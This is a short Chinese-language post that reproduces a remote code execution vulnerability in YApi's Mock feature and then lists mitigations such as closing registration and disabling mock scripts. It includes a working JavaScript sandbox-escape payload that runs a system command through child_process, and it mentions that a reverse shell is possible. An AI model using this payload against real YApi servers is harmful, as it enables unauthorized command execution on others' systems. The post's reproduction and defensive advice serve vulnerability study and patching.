其他
YApi Mock功能远程代码执行漏洞复现
本文字数:690阅读时长:3~4min声明:请勿用作违法用途,否则后果自负
docker部署:
https://github.com/Ryan-Miao/docker-yapi1.注册用户
2.添加项目
访问/add-project
3.添加接口
4.设置mock
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("ifconfig").toString()5.查看Mock地址
7.同理,也可利用命令反弹shell
在"config.json"添加"closeRegister:true"配置项:{ "port": "*****", "closeRegister":true}2、暂时关闭mock功能(需要修改YApi代码)
if (caseData&&caseData.case_enable{...}在其上方添加
if(!yapi.WEBCONFIG.mock) {return false;}3、白名单限制;
4、检查用户列表,删除恶意不明用户;并删除恶意不明用户创建的接口及mock脚本。
安全路上,与你并肩前行